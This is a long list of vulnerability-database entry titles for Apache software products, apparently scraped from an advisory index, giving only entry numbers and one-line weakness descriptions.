| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
| [58687] Apache Axis Invalid wsdl Request XSS
| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
| [58685] Apache Velocity Template Designer Privileged Code Execution
| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
| [58667] Apache Roller Database Cleartext Passwords Disclosure
| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
| [56984] Apache Xerces2 Java Malformed XML Input DoS
| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
| [55056] Apache Tomcat Cross-application TLD File Manipulation
| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
| [54589] Apache Jserv Nonexistent JSP Request XSS
| [54122] Apache Struts s:a / s:url Tag href Element XSS
| [54093] Apache ActiveMQ Web Console JMS Message XSS
| [53932] Apache Geronimo Multiple Admin Function CSRF
| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
| [53930] Apache Geronimo /console/portal/ URI XSS
| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
| [53380] Apache Struts Unspecified XSS
| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
| [51151] Apache Roller Search Function q Parameter XSS
| [50482] PHP with Apache php_value Order Unspecified Issue
| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
| [47096] Oracle Weblogic Apache Connector POST Request Overflow
| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
| [43452] Apache Tomcat HTTP Request Smuggling
| [43309] Apache Geronimo LoginModule Login Method Bypass
| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
| [42091] Apache Maven Site Plugin Installation Permission Weakness
| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
| [40262] Apache HTTP Server mod_status refresh XSS
| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
| [36080] Apache Tomcat JSP Examples Crafted URI XSS
| [36079] Apache Tomcat Manager Uploaded Filename XSS
| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
| [34881] Apache Tomcat Malformed Accept-Language Header XSS
| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
| [32724] Apache mod_python _filter_read Freed Memory Disclosure
| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
| [24365] Apache Struts Multiple Function Error Message XSS
| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
| [22459] Apache Geronimo Error Page XSS
| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
| [21021] Apache Struts Error Message XSS
| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
| [20439] Apache Tomcat Directory Listing Saturation DoS
| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
| [20285] Apache HTTP Server Log File Control Character Injection
| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
| [19821] Apache Tomcat Malformed Post Request Information Disclosure
| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
| [18233] Apache HTTP Server htdigest user Variable Overfow
| [17738] Apache HTTP Server HTTP Request Smuggling
| [16586] Apache HTTP Server Win32 GET Overflow DoS
| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
| [13304] Apache Tomcat realPath.jsp Path Disclosure
| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
| [12848] Apache HTTP Server htdigest realm Variable Overflow
| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
| [12557] Apache HTTP Server prefork MPM accept Error DoS
| [12233] Apache Tomcat MS-DOS Device Name Request DoS
| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
| [12231] Apache Tomcat web.xml Arbitrary File Access
| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
16109| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
16110| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
16111| [12178] Apache Jakarta Lucene results.jsp XSS
16112| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
16113| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
16114| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
16115| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
16116| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
16117| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
16118| [10471] Apache Xerces-C++ XML Parser DoS
16119| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
16120| [10068] Apache HTTP Server htpasswd Local Overflow
16121| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
16122| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
16123| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
16124| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
16125| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
16126| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
16127| [9717] Apache HTTP Server mod_cookies Cookie Overflow
16128| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
16129| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
16130| [9714] Apache Authentication Module Threaded MPM DoS
16131| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
16132| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
16133| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
16134| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
16135| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
16136| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
16137| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
16138| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
16139| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
16140| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
16141| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
16142| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
16143| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
16144| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
16145| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
16146| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
16147| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
16148| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
16149| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
16150| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
16151| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
16152| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
16153| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
16154| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
16155| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
16156| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
16157| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
16158| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
16159| [9208] Apache Tomcat .jsp Encoded Newline XSS
16160| [9204] Apache Tomcat ROOT Application XSS
16161| [9203] Apache Tomcat examples Application XSS
16162| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
16163| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
16164| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
16165| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
16166| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
16167| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
16168| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
16169| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
16170| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
16171| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
16172| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
16173| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
16174| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
16175| [7611] Apache HTTP Server mod_alias Local Overflow
16176| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
16177| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
16178| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
16179| [6882] Apache mod_python Malformed Query String Variant DoS
16180| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
16181| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
16182| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
16183| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
16184| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
16185| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
16186| [5526] Apache Tomcat Long .JSP URI Path Disclosure
16187| [5278] Apache Tomcat web.xml Restriction Bypass
16188| [5051] Apache Tomcat Null Character DoS
16189| [4973] Apache Tomcat servlet Mapping XSS
16190| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
16191| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
16192| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
16193| [4568] mod_survey For Apache ENV Tags SQL Injection
16194| [4553] Apache HTTP Server ApacheBench Overflow DoS
16195| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
16196| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
16197| [4383] Apache HTTP Server Socket Race Condition DoS
16198| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
16199| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
16200| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
16201| [4231] Apache Cocoon Error Page Server Path Disclosure
16202| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
16203| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
16204| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
16205| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
16206| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
16207| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
16208| [3322] mod_php for Apache HTTP Server Process Hijack
16209| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
16210| [2885] Apache mod_python Malformed Query String DoS
16211| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
